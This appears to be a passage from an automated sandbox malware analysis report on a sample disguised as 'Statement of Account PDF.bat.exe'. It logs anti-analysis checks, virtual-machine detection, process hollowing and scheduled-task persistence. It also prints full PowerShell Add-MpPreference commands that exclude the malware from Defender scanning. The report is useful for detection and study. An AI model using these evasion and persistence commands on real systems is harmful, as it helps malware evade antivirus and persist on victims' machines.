                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1196023
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195621
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195511
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1196936s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1196828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1196719s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1196594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1196484s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1196375s >= -30000s
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98844
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98719
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98610
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98485
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98329
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98154
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98042
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97723
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97594
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97485
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97358
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97163
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199951
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199839
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199719
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199609
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199473
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199335
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199219
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199105
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198956
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198828
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198719
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198411
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198281
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198172
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198062
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197953
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197844
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197734
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197621
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197500
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197391
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197276
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197156
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197047
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196936
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196828
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196719
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196594
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196484
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196375
                      Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BjTxJte.exe_f5c09dd75b90d612af8c658c8837992c387ee89_843aacda_4690c535-c6af-41e6-8128-f3000ded106c\
                      Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
                      Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
                      Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_gDdsxauPhk.exe_e2c8de6e9dfbc3bf198524a8a8bae3ea56c2edb2_cb724c00_6c828731-bc0c-4d10-93b3-5ed4934f0644\
                      Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
                      Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
                      Source: BjTxJte.exe, 00000016.00000002.1923322227.0000000001709000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
                      Source: BjTxJte.exe, 00000012.00000002.1852257669.00000000010B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.00000000014AB000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4077118774.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process queried: DebugPort
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Memory written: C:\Users\user\Desktop\Statement of Account PDF.bat.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe Memory written: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Memory written: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp"
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Process created: C:\Users\user\Desktop\Statement of Account PDF.bat.exe "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp"
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe Process created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp44D2.tmp"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp6598.tmp"
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Queries volume information: C:\Users\user\Desktop\Statement of Account PDF.bat.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
